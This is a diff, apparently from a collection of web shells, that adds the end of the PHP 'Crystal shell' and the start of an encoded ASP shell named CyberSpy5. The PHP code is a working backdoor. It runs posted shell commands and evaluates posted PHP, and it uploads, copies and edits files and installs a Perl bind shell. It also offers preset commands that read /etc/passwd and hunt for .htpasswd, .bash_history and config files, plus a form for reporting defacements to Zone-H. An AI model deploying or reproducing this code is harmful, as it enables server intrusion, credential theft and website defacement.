+if( $mode & 0x1000 ) { $type='p'; }
+else if( $mode & 0x2000 ) { $type='c'; }
+else if( $mode & 0x4000 ) { $type='d'; }
+else if( $mode & 0x6000 ) { $type='b'; }
+else if( $mode & 0x8000 ) { $type='-'; }
+else if( $mode & 0xA000 ) { $type='l'; }
+else if( $mode & 0xC000 ) { $type='s'; }
+else $type='u';
+$owner["read"] = ($mode & 00400) ? 'r' : '-';
+$owner["write"] = ($mode & 00200) ? 'w' : '-';
+$owner["execute"] = ($mode & 00100) ? 'x' : '-';
+$group["read"] = ($mode & 00040) ? 'r' : '-';
+$group["write"] = ($mode & 00020) ? 'w' : '-';
+$group["execute"] = ($mode & 00010) ? 'x' : '-';
+$world["read"] = ($mode & 00004) ? 'r' : '-';
+$world["write"] = ($mode & 00002) ? 'w' : '-';
+$world["execute"] = ($mode & 00001) ? 'x' : '-';
+if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
+if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
+if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
+$s=sprintf("%1s", $type);
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
+return trim($s);
+}
+
+
+
+
+
+
+if(isset($_POST['post']) and $_POST['post'] == "yes" and @$HTTP_POST_FILES["userfile"][name] !== "")
+{
+copy($HTTP_POST_FILES["userfile"]["tmp_name"],$HTTP_POST_FILES["userfile"]["name"]);
+}
+
+if((isset($_POST['fileto']))||(isset($_POST['filefrom'])))
+
+{
+$data = implode("", file($_POST['filefrom']));
+$fp = fopen($_POST['fileto'], "wb");
+fputs($fp, $data);
+$ok = fclose($fp);
+if($ok)
+{
+$size = filesize($_POST['fileto'])/1024;
+$sizef = sprintf("%.2f", $size);
+print "<center><div id=logostrip>Download - OK. (".$sizef."??)</div></center>";
+}
+else
+{
+print "<center><div id=logostrip>Something is wrong. Download - IS NOT OK</div></center>";
+}
+}
+
+if (isset($_POST['installbind'])){
+
+if (is_dir($_POST['installpath']) == true){
+chdir($_POST['installpath']);
+$_POST['installpath'] = "temp.pl";}
+
+
+$fp = fopen($_POST['installpath'], "w");
+fwrite($fp, $bind);
+fclose($fp);
+
+exec("perl " . $_POST['installpath']);
+chdir($dir);
+
+
+}
+
+
+@$ef = stripslashes($_POST['editfile']);
+if ($ef){
+$fp = fopen($ef, "r");
+$filearr = file($ef);
+
+
+
+$string = '';
+$content = '';
+foreach ($filearr as $string){
+$string = str_replace("<" , "&lt;" , $string);
+$string = str_replace(">" , "&gt;" , $string);
+$content = $content . $string;
+}
+
+echo "<center><div id=logostrip>Edit file: $ef </div><form action=\"$REQUEST_URI\" method=\"POST\"><textarea name=content cols=100 rows=20>$content</textarea>
+<input type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\">
+<input type=\"hidden\" name=\"savefile\" value=\"{$_POST['editfile']}\"><br>
+<input type=\"submit\" name=\"submit\" value=\"Save\" id=input></form></center>";
+fclose($fp);
+}
+
+if(isset($_POST['savefile'])){
+
+$fp = fopen($_POST['savefile'], "w");
+$content = stripslashes($content);
+fwrite($fp, $content);
+fclose($fp);
+echo "<center><div id=logostrip>saved -OK!</div></center>";
+
+}
+
+
+if (isset($_POST['php'])){
+
+echo "<center><div id=logostrip>eval code<br><form action=\"$REQUEST_URI\" method=\"POST\"><textarea name=phpcode cols=100 rows=20></textarea><br>
+<input type=\"submit\" name=\"submit\" value=\"Exec\" id=input></form></center></div>";
+}
+
+
+
+if(isset($_POST['phpcode'])){
+
+echo "<center><div id=logostrip>Results of PHP execution<br><br>";
+@eval(stripslashes($_POST['phpcode']));
+echo "</div></center>";
+
+
+}
+
+
+if ($cmd){
+
+if($sertype == "winda"){
+ob_start();
+execute($cmd);
+$buffer = "";
+$buffer = ob_get_contents();
+ob_end_clean();
+}
+else{
+ob_start();
+echo decode(execute($cmd));
+$buffer = "";
+$buffer = ob_get_contents();
+ob_end_clean();
+}
+
+if (trim($buffer)){
+echo "<center><div id=logostrip>Command: $cmd<br><textarea cols=100 rows=20>";
+echo decode($buffer);
+echo "</textarea></center></div>";
+}
+
+}
+$arr = array();
+
+$arr = array_merge($arr, glob("*"));
+$arr = array_merge($arr, glob(".*"));
+$arr = array_merge($arr, glob("*.*"));
+$arr = array_unique($arr);
+sort($arr);
+echo "<table><tr><td>Name</td><td><a title=\"Type of object\">Type</a></td><td>Size</td><td>Last access</td><td>Last change</td><td>Perms</td><td><a title=\"If Yes, you have write permission\">Write</a></td><td><a title=\"If Yes, you have read permission\">Read</a></td></tr>";
+
+foreach ($arr as $filename) {
+
+if ($filename != "." and $filename != ".."){
+
+if (is_dir($filename) == true){
+$directory = "";
+$directory = $directory . "<tr><td>$filename</td><td>" . filetype($filename) . "</td><td></td><td>" . date("G:i j M Y",fileatime($filename)) . "</td><td>" . date("G:i j M Y",filemtime($filename)) . "</td><td>" . perms(fileperms($filename));
+if (is_writable($filename) == true){
+$directory = $directory . "<td>Yes</td>";}
+else{
+$directory = $directory . "<td>No</td>";
+
+}
+
+if (is_readable($filename) == true){
+$directory = $directory . "<td>Yes</td>";}
+else{
+$directory = $directory . "<td>No</td>";
+}
+$dires = $dires . $directory;
+}
+
+if (is_file($filename) == true){
+$file = "";
+$file = $file . "<tr><td><a onclick=tag('$filename')>$filename</a></td><td>" . filetype($filename) . "</td><td>" . filesize($filename) . "</td><td>" . date("G:i j M Y",fileatime($filename)) . "</td><td>" . date("G:i j M Y",filemtime($filename)) . "</td><td>" . perms(fileperms($filename));
+if (is_writable($filename) == true){
+$file = $file . "<td>Yes</td>";}
+else{
+$file = $file . "<td>No</td>";
+}
+
+if (is_readable($filename) == true){
+$file = $file . "<td>Yes</td></td></tr>";}
+else{
+$file = $file . "<td>No</td></td></tr>";
+}
+$files = $files . $file;
+}
+
+
+
+}
+
+
+
+}
+echo $dires;
+echo $files;
+echo "</table><br>";
+
+
+
+
+echo "
+<form action=\"$REQUEST_URI\" method=\"POST\">
+Command:<INPUT type=\"text\" name=\"cmd\" size=30 value=\"$cmd\">
+
+
+Directory:<INPUT type=\"text\" name=\"dir\" size=30 value=\"";
+
+echo getcwd();
+echo "\">
+<INPUT type=\"submit\" value=\"..Exec..\"></form>";
+
+
+
+
+
+if (ini_get('safe_mode') == 1){echo "<br><font size=\"3\"color=\"#cc0000\"><b>SAFE MOD IS ON<br>
+Including from here: "
+. ini_get('safe_mode_include_dir') . "<br>Exec here: " . ini_get('safe_mode_exec_dir'). "</b></font>";}
+
+
+
+
+?>
+
+
+</td></tr></table></p></td></tr></table>
+	</a><br><hr size="1" noshade><p align="right">
+	<font face="Wingdings 3" size="5" color="#DCE7EF">&lt;</font><b><select name="act"><option value="ls">
+	With selected:</option><option value="delete">Delete</option><option value="archive">
+	Archive</option><option value="cut">Cut</option><option value="copy">Copy</option><option value="unselect">
+	Unselect</option></select>&nbsp;<input type="submit" value="Confirm"></p></form></td></tr></table><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr><td width="100%" height="1" valign="top" colspan="2" bgcolor="#000000"><p align="center">
+	<b>
+	:: </b>
+	<font face=Verdana size=-2><a href="?act=command">Executed command</a></font><b> ::</b></p></td></tr><tr><td width="50%" height="1" valign="top" bgcolor="#000000" style="color: #000000; border: 1px solid #000000"><center><b>
+	<?
+	echo "
+<form action=\"$REQUEST_URI\" method=\"POST\">
+Command:<INPUT type=\"text\" name=\"cmd\" size=30 value=\"$cmd\">";
+?>
+		<input type="submit" name="submit1" value="Command" style="border: 1px solid #000000"><font face="Wingdings 3" color="#DCE7EF" size="3">f</font></form><p>
+	&nbsp;</p>
+	</td>
+	<td width="50%" height="1" valign="top" bgcolor="#000000" style="color: #000000"><center>
+	<form action="?act=cmd" method="POST"><input type="hidden" name="act" value="cmd"><input type="hidden" name="d" value="c:/appserv/www/shells/">
+		<font color="#DCE7EF">Select</font><font face="Wingdings 3" color="#DCE7EF" size="3">g</font><select name="cmd" size="1"><option value="ls -la">
+		-----------------------------------------------------------</option>
+		<option value="ls -la /var/lib/mysq">ls MySQL</option>
+		<option value="which curl">cURL ?</option>
+		<option value="which wget">Wget ?</option>
+		<option value="which lynx">Lynx ?</option>
+		<option value="which links">links ?</option>
+		<option value="which fetch">fetch ?</option>
+		<option value="which GET">GET ?</option>
+		<option value="which per">Perl ?</option>
+		<option value="gcc --help">C gcc Help ?</option>
+		<option value="tar --help">tar Help ?</option>
+		<option value="cat /etc/passwd">Get passwd !!!</option>
+		<option value="cat /etc/hosts">Get hosts</option>
+		<option value="perl --help">Perl Help ?</option>
+		<option value="find / -type f -perm -04000 -ls">
+		find all suid files</option><option value="find . -type f -perm -04000 -ls">
+		find suid files in current dir</option><option value="find / -type f -perm -02000 -ls">
+		find all sgid files</option><option value="find . -type f -perm -02000 -ls">
+		find sgid files in current dir</option><option value="find / -type f -name config.inc.php">
+		find config.inc.php files</option><option value="find / -type f -name &quot;config*&quot;">
+		find config* files</option><option value="find . -type f -name &quot;config*&quot;">
+		find config* files in current dir</option><option value="find / -perm -2 -ls">
+		find all writable directories and files</option><option value="find . -perm -2 -ls">
+		find all writable directories and files in current dir</option><option value="find / -type f -name service.pwd">
+		find all service.pwd files</option><option value="find . -type f -name service.pwd">
+		find service.pwd files in current dir</option><option value="find / -type f -name .htpasswd">
+		find all .htpasswd files</option><option value="find . -type f -name .htpasswd">
+		find .htpasswd files in current dir</option><option value="find / -type f -name .bash_history">
+		find all .bash_history files</option><option value="find . -type f -name .bash_history">
+		find .bash_history files in current dir</option><option value="find / -type f -name .fetchmailrc">
+		find all .fetchmailrc files</option><option value="find . -type f -name .fetchmailrc">
+		find .fetchmailrc files in current dir</option><option value="lsattr -va">
+		list file attributes on a Linux second extended file system</option><option value="netstat -an | grep -i listen">
+		show opened ports</option></select><input type="hidden" name="cmd_txt" value="1">&nbsp;<input type="submit" name="submit" value="Execute" style="border: 1px solid #000000"></form></td></tr></TABLE><a bookmark="minipanel" href="?act=bind"><font face="Verdana" size="-2">Bind port to</font><font face="Webdings" size="5" color="#DCE7EF">Â</font></a><font color="#00FF00"><br>
+</font>
+<a bookmark="minipanel">
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr>
+ <td width="50%" height="1" valign="top" style="color: #DCE7EF" bgcolor="#000000"><form method="POST">
+	<p align="center">
+<a bookmark="minipanel">
+	<b><font face="verdana" color="red" size="4">
+	<a style="font-weight: normal; font-family: verdana; text-decoration: none" bookmark="minipanel">
+	<font face="verdana" size="2" color="#DCE7EF">::</font></a></font></b><a href="?act=edit" bookmark="minipanel"><span lang="en-us"><font face="Verdana" size="2">Edit/Create
+	file</font></span></a><b><font face="verdana" color="red" size="4"><a style="font-weight: normal; font-family: verdana; text-decoration: none" bookmark="minipanel"><font face="verdana" size="2" color="#DCE7EF">::</font></a></font></b><font face="Wingdings 2" size="2">&quot;</font></p><p align="center">
+	&nbsp;<?
+if ($act == "edit") {echo "<center><b>ÇáÊÍÑíÑ æÇáÇäÔÇÁ:<br><br> Şã ÈæÖÚ ÇÓã Çáãáİ ÇáĞí ÊÑíÏ ÊÍÑíÑå İŞØ<br>æÈÚÏ ĞÇáß ÇáÖÛØ Úáì config.php ãËÇá<br>Edit<br>ÓÊÙåÑ áß äÇİĞå ÈåÇ ãÍÊæíÇÊ Çáãáİ <br>æÇíÖÇ ğ ÇĞÇ ÇÑÏÊ ÇäÔÇÁ ãáİ İŞØ ÖÚ ÇÓãå ãÚ ÇáÇãÊÏÇÏ <br>æÈÚÏ ĞÇáß ÇßÊÈ ãÇÊÑíÏ washer-crystal.txt   </a>.</b>";}
+?>
+	</p>
+	<p>&nbsp;</p>
+	<p>	<?
+	echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
+File to edit:
+<input type=\"text\" name=\"editfile\" >
+<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\">
+<INPUT type=\"submit\" value=\"Edit\"></form></div>";
+?>
+	</p>
+	</form></center></p></td>
+ <td width="50%" height="1" valign="top" style="color: #DCE7EF" bgcolor="#000000"><p align="center">
+                 <?
+if ($act == "upload") {echo "<center><b>ÑİÚ ÇáãáİÇÊ:<br><br>Şã ÈÊÍÏíÏ Çáãáİ ÇáãÑÇÏ ÑİÚå <br>æÈÚÏ ĞÇáß Şã ÈÇáÖÛØ Úáì ÇáÎíÇÑ ÇáãæÖÍ<br>UPLOAD< </a>.</b>";}
+?><a bookmark="minipanel"><b><font size="2">::
+	</font>
+	</b><a href="?act=upload"><span lang="en-us"><font face="Verdana" size="2">
+					upload</font></span></a><b><font size="2">::</font></b><font face=Webdings size=2>&#325;</font><font size="2"></a></a></font><br><form method="POST" ENCTYPE="multipart/form-data"><input type="hidden" name="miniform" value="1"><input type="hidden" name="act" value="upload">&nbsp;
+		<?
+		echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+<INPUT type=\"file\" name=\"userfile\">
+<INPUT type=\"hidden\" name=\"post\" value=\"yes\">
+<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\">
+<INPUT type=\"submit\" value=\"Download\"></form></div>";
+?>
+	<p></form></p></td>
+
+</tr>
+</table>	<b>
+<font size=-2 face=verdana color="white">
+                  <p>&nbsp;<a href="?act=Defacer">Defacer Zone-H</a></font><p align="center">&nbsp;
+</p>
+ 					<?
+if ($act == "Defacer") {echo "<center><b>CRYSTAL-H:<br><br>ÇÓã ÇáãÚáä Defacer<br>ÇáãæŞÚ ÇáãÎÊÑŞ Victim<br>æÖÚ ÇáÇÎÊÑÇŞ Çí äæÚ ÇáËÛÑå ÇáÊì ÇÓÊËãÑÊåÇ Attack Mode <br> ÓÈÈ ÇáÇÎÊÑÇŞ Attack Reason <br>áÇÑÓÇá ÇáÇÎÊÑÇŞ sand   <br> áÑÄíå ÇÎÑ ÇáÊÍĞíÑÇÊ ÇáãÑÓáå ÈÇáãæŞÚ Attacks On Hold</a>.</b>";}
+?>                 <p align="center"><font face="Verdana" color="#CC0000">
+                  <SCRIPT language=JavaScript type=text/javascript>
+        <!--
+        function validate(){
+            document.notifyForm.action = "http://www.zone-h.org/component/option,com_notify/Itemid,89/task,single/"
+            document.notifyForm.submit();
+        }
+        //-->
+        </SCRIPT>
+
+                  Defacer </font></font></font>
+<font face=Verdana color=#CC0000>
+					Zone-h</font><FORM name=notifyForm
+                  action=http://www.zone-h.org/component/option,com_notify/Itemid,89/task,single/
+                  method=post>
+                  <TABLE class=contentpane cellSpacing=0 cellPadding=0
+                  width="100%" border=0>
+                    <TBODY>
+                    <!-- DESCRIPTION -->
+                    <TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa">
+                      <TD style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa"></TD></TR><!-- INSTRUCTIONS -->
+                    </TBODY></TABLE>
+                  <TABLE cellSpacing=0 cellPadding=10 width="100%" border=0 style="color: #CC0000; border: 1px outset #000000; background-color: #000000">
+                    <TBODY>
+                    <TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa">
+                      <TD align=left style="color: #DCE7EF; border: 1px solid #FFFFFF; background-color: #000000" bgcolor="#000000" bordercolorlight="#000000" bordercolordark="#000000">
+                        <TABLE width="100%" style="border: 1px outset #eeeeee; background-color: #EEEEEE">
+                          <TBODY>
+                          <TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa">
+                            <TD style="border-left:1px solid #eeeeee; border-right:1px solid #aaaaaa; border-top:1px solid #eeeeee; border-bottom:1px solid #aaaaaa; BACKGROUND-COLOR: #000000"
+                              align=left><SPAN
+                              style="FONT-SIZE: 4px">&nbsp;</SPAN></TD></TR></TBODY></TABLE><!-- Input Form --><TABLE class=notifyForm width="100%">
+                          <TBODY>
+                          <TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa">
+                            <TD noWrap align=left width="15%"
+                              height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000"><b><font size="1" color="#FF0000">
+							::Defacer::</font></b>:<font size=-2 face=verdana color=white><b><font face=Wingdings color=gray size="1">è</font></TD><TD noWrap align=left height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000">
+							<INPUT
+                              class=inputbox id=defacer style="WIDTH: 276px; color:#CC0000; background-color:#EEEEEE"
+                              maxLength=64 name=defacer size="1" value="Super-Crystal"> </font></font>
+							</font></TD>
+							<font size=-2 face=verdana color=white>
+                          <TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa">
+                            <TD noWrap align=left height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000">
+							<b><font size="1" color="#FF0000">::Victim::</font></b>:<font size=-2 face=verdana color=white><b><font face=Wingdings color=gray size="1">è</font></TD><TD noWrap align=left height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000">
+							<INPUT
+                              class=inputbox id=domain style="WIDTH: 276px; color:#CC0000; background-color:#EEEEEE"
+                              maxLength=250 value=http://www.microsoft.com name=domain size="1"> </TD>
+                          <TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa">
+                            <TD noWrap align=left height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000">
+							<b>
+							<font color="#FF0000" size="1">Attack Mode</font></b>:<font size=-2 face=verdana color=white><b><font face=Wingdings color=gray size="1">è</font></TD><TD align=left height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000">
+							<SELECT class=inputbox
+                              style="WIDTH: 276px; color:#CC0000; background-color:#EEEEEE" name=method size="1"> <OPTION
+                                value="" selected>choose</OPTION> <OPTION
+                                value=23>Access credentials through Man In the
+							Middle attack</OPTION><OPTION value=22>Attack
+							against the administrator/user (password
+							stealing/sniffing)</OPTION><OPTION value=29>DNS
+							attack through cache poisoning</OPTION><OPTION
+                                value=28>DNS attack through social engineering</OPTION><OPTION value=17>
+							File Inclusion</OPTION><OPTION value=9>FTP Server
+							intrusion</OPTION><OPTION value=8>Mail Server
+							intrusion</OPTION><OPTION value=30>Not available</OPTION><OPTION value=14>
+							Other Server intrusion</OPTION><OPTION value=18>
+							Other Web Application bug</OPTION><OPTION value=19>
+							Remote administrative panel access through
+							bruteforcing</OPTION><OPTION value=20>Remote
+							administrative panel access through password
+							guessing</OPTION><OPTION value=21>Remote
+							administrative panel access through social
+							engineering</OPTION><OPTION value=25>Remote service
+							password bruteforce</OPTION><OPTION
+                                value=24>Remote service password guessing</OPTION><OPTION value=26>
+							Rerouting after attacking the Firewall</OPTION><OPTION
+                                value=27>Rerouting after attacking the Router</OPTION><OPTION value=12>
+							RPC Server intrusion</OPTION><OPTION value=13>Shares
+							misconfiguration</OPTION><OPTION value=15>SQL
+							Injection</OPTION><OPTION value=10>SSH Server
+							intrusion</OPTION><OPTION value=11>Telnet Server
+							intrusion</OPTION><OPTION value=16>URL Poisoning</OPTION><OPTION value=7>
+							Web Server external module intrusion</OPTION><OPTION
+                                value=6>Web Server intrusion</OPTION></SELECT></TD></TR><TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa">
+                            <TD noWrap align=left height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000">
+							<b>
+							<font size="1" color="#FF0000">Attack Reason</font></b>:<font size=-2 face=verdana color=white><b><font face=Wingdings color=gray size="1">è</font></TD><TD align=left height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000">
+							<SELECT class=inputbox
+                              style="WIDTH: 276px; color:#CC0000; background-color:#EEEEEE" name=reason size="1"> <OPTION
+                                value="" selected>choose</OPTION> <OPTION
+                                value=4>As a challenge</OPTION><OPTION
+                                value=1>Heh...just for fun!</OPTION><OPTION
+                                value=5>I just want to be the best defacer</OPTION><OPTION value=7>
+							Not available</OPTION><OPTION
+                                value=6>Patriotism</OPTION><OPTION
+                                value=3>Political reasons</OPTION><OPTION
+                                value=2>Revenge against that website</OPTION></SELECT></TD></TR></TBODY></TABLE><TABLE width="100%" style="border: 1px outset #eeeeee; background-color: #EEEEEE">
+                          <TBODY>
+                          <TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa">
+                            <TD style="border-left:1px solid #eeeeee; border-right:1px solid #aaaaaa; border-top:1px solid #eeeeee; border-bottom:1px solid #aaaaaa; BACKGROUND-COLOR: #000000"
+                              align=left><SPAN
+                              style="FONT-SIZE: 4px">&nbsp;</SPAN></TD></TR></TBODY></TABLE><DIV style="CLEAR: both"></DIV>
+                        <TABLE class=notifyForm width="100%">
+                          <TBODY>
+                          <TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa">
+                            <TD align=left style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa" bgcolor="#000000">
+							<INPUT class=button onclick=validate() type=button value=Send name=send style="color: #CC0000; border: 1px solid #C0C0C0; background-color: #EEEEEE">&nbsp;&nbsp;<b><font size=4 face="Wingdings 3">:</font></b>&nbsp;&nbsp;
+							</font></font>
+<font size=6 face=Webdings color="#FF0000">L </font><b>
+							<a class="sublevel" href="http://www.zone-h.org/component/option,com_attacks/Itemid,45/">
+							<font color="#FF0000">Attacks On Hold</font></a></b><font color="#FF0000">
+							</font>
+<font size=6 face=Webdings color="#FF0000">L</TD></TR></TBODY></TABLE><INPUT type=hidden
+                        value=com_notify name=option style="font-family: Verdana; font-size: 10px; color: black; border: 2px solid black; background-color: #C0C0C0"></TR></TBODY></TABLE></FORM></font></b><br>
+<br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr>
+	<td width="990" height="1" valign="top" style="color: #DCE7EF" bgcolor="#000000"><p align="center">
+	<b>
+	&nbsp;</b><font face="Wingdings 3" size="5">y</font><b>Crystal shell v. 1 beta&nbsp; </b><font color="#CC0000"><b>©oded by</b> </font><b><a href="http://www.tryag.com">TrYaG Team</a> <span lang="en-us">l</span></b> <b><a href="?act=team">Arab Security Center Team</a> |<a href="http://www.secure4center.com"><font color="#DCE7EF">securityCenter</font></a>|
+	: Web </b><font face="Wingdings 3" size="5">x</font></p><p align="center">&nbsp;</p></td></tr></table>
+
+</a>
+
+
+<div align="right">
+
+<span lang="en-us">&nbsp; </span><TABLE cellSpacing=0 cellPadding=0 border=0>
+  <TBODY>
+  <TR>
+    <TD align=middle style="font-family: verdana, arial, 'ms sans serif', sans-serif; font-size: 11px; color: #D5ECF9">
+      <TABLE class=calendar_table cellSpacing=1 cellPadding=1>
+        <TBODY>
+        <TR>
+          <TD class=calendar_month colSpan=7><span lang="en-us">CRYSTAL-<font color="#CC0000">H</font></span><font color="#CC0000">
+			2006</font></TD></TR><TR>
+          <TD class=calendar_days>P</TD><TD class=calendar_days>P</TD><TD class=calendar_days>S</TD><TD class=calendar_days>C</TD><TD class=calendar_days>P</TD><TD class=calendar_days>C</TD><TD class=calendar_days>C</TD></TR><TR>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD></TR>
+        <TR>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day>1 </TD></TR>
+        <TR>
+          <TD class=calendar_day>2 </TD>
+          <TD class=calendar_day>3 </TD>
+          <TD class=calendar_day><font color="#FF0000">4 </font> </TD>
+          <TD class=calendar_day><font color="#FF0000">5 </font> </TD>
+          <TD class=calendar_day><font color="#FF0000">6 </font> </TD>
+          <TD class=calendar_day><font color="#FF0000">7 </font> </TD>
+          <TD class=calendar_day><font color="#FF0000">8 </font> </TD></TR>
+        <TR>
+          <TD class=calendar_day>9 </TD>
+          <TD class=calendar_day><font color="#FF0000">10 </font> </TD>
+          <TD class=calendar_day><font color="#FF0000">11 </font> </TD>
+          <TD class=calendar_day><font color="#FF0000">12 </font> </TD>
+          <TD class=calendar_day>13</TD><TD class=calendar_day>14 </TD>
+          <TD class=calendar_day>15 </TD></TR>
+        <TR>
+          <TD class=calendar_day><font color="#FF0000">16 </font> </TD>
+          <TD class=calendar_day><font color="#FF0000">17 </font> </TD>
+          <TD class=calendar_day><font color="#FF0000">18</font></TD><TD class=calendar_day>19</TD><TD class=calendar_day>20 </TD>
+          <TD class=calendar_day>21 </TD>
+          <TD class=calendar_current_day>22 </TD></TR>
+        <TR>
+          <TD class=calendar_day>23</TD><TD class=calendar_day>24</TD><TD class=calendar_day>25</TD><TD class=calendar_day>26</TD><TD class=calendar_day><font color="#FF0000">27</font></TD><TD class=calendar_day><font color="#FF0000">28</font></TD><TD class=calendar_day><font color="#FF0000">29</font></TD></TR><TR>
+          <TD class=calendar_day>30</TD><TD class=calendar_day>31</TD><TD class=calendar_day></TD>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD></TR></TBODY></TABLE></TD></TR>
+  </TBODY></TABLE>
+
+        </div>
+
+
+</body></html>
diff --git a/138shell/C/CyberSpy5.Asp.txt b/138shell/C/CyberSpy5.Asp.txt
new file mode 100644
index 0000000..bcf5138
--- /dev/null
+++ b/138shell/C/CyberSpy5.Asp.txt
@@ -0,0 +1,2 @@
+<%@ LANGUAGE = VBScript.Encode %>
+<%#@~^FkQBAA==@#@&rU,2MDWMP"n/!:nPg+aO@#@&?.\DRU^.kaY:kh+6;DP~',{ Z!@#@&@#@&frh,1n/	nw?6@#@&"+/aW	d+c.kD+~E@!/YHs+@*PA}9ePPPUZ]rJJ~b]O~)?AO/6drIl~[&$&~f~i~UZ"rSdAz]OzI]rqO/6drI=~a2&swffi,8,@!&/Oz^+@*J@#@&I/2G	/+ 	MkO+,E@!4G9X,4o1W^GD{!T!Z!T~D+6DxB[!!woT!EP^kU3xv[!TswT!EPCsbx3xv[!TswTZB~7Vbx3{B[T!wsT!EPOGa:lMLk	'!@*E@#@&@#@&`w[lOn;W[+,xPrtOOa)z&ASh ZH8DRqlMDkKDc6DTz/X(+.jaX*c)/agu-kE@#@&@#@&BRORR ORO RO O)UKxkh~`wsWm[;VCk/,?YmDD~ZKNnO ORR OO RO OO RRO O ORORR @#@&Z^C/kPor^+j2sKl[+M@#@&dK!4^km,PwrV/@#@&in.r7lY~sKD:Asn:mxhD#@#@&7hDr\mO+,?;8,ZVCdk{(xbOblsby`#@#@&i7?Y~sbVnd,'PUnD7+Dc/.+mYr8Ln^D`E?1.kaYrUTRfr^DkGxm.HJb@#@&id?Y,oWM:3V:CUhD.,xPU+D7n.R;DlO+68N+^YvE?1Dr2DkxL Gk^YbG	l.HJ*@#@&i2	[PUE8@#@&dK.b\lDnPUE4,/slk/|KnDhr	lO+vb@#@&d7rwPqd6(LnmDcwks/*PK4+	@#@&id7sbVndcI+sG\bV^cb@#@&didj+O~wks+k~',1GO4kxL@#@&d72	[,ko@#@&idkwP&dr(LnmD`oGM:2^n:mxnM#bP:tx@#@&77isGDs3V:CUhD. ]:G\)^Vc*@#@&ddi?OPwW.:AVnhmxnM#P{P1KO4k	o@#@&7d3U9Prs@#@&dAx[~UE4@#@&in;4^r1PKMWa+DDX,!+DPoWM:cd&xNa#@#@&dioGDsP{PEJ@#@&idrs,oWM:3s:lUKM. 2XrkYdvS;l/`k(x9+a#*PP4xPwGDsP',oGDs2^+hlUKM. qDn:vS/Ck+`d(	Nn6*b@#@&7Ax9PnMWanDDX@#@&in;8^km,9+6lE^O~?!4,j2VGC9`b@#@&7dGkh~(kfCOm~~/&UaEOgls+@#@&di9ksPUnK/$nTkxB~xhW/AU[~,xhWd~~-GlOl~GE	NdS,xfCOmAGE	[hWd@#@&idfb:,UnK/ok^+S~	nWk$W!xN@#@&7d(kGlOl~x,In;!n/DR$r	lDz]l[`"n$EnkYcKWDl^$XD+d#@#@&77	nWk$+Tkx,x~F@#@&idUnGdAx[P{~q	/O.~`xKGkAnobUBP8bfmYlBP;$XD+jYMkULvZtMcF2##*@#@&dikwPcxKGk2UN UnK/$nTkxb~@!'~!,P4+U,2XkY,?!8@#@&d7\GlOC~WE	[/,'Ptr[Av4bfCYCS,xKWk$+TkUS,xnGdAx[O	KK/$obx#@#@&i7xGlOl~W;U9nWk~',qxkO.AvFBP8k9CDlSP79lDl$G!xNdb@#@&7dGG,jUDk^PxGlDCAKEUNhWd~{Pq	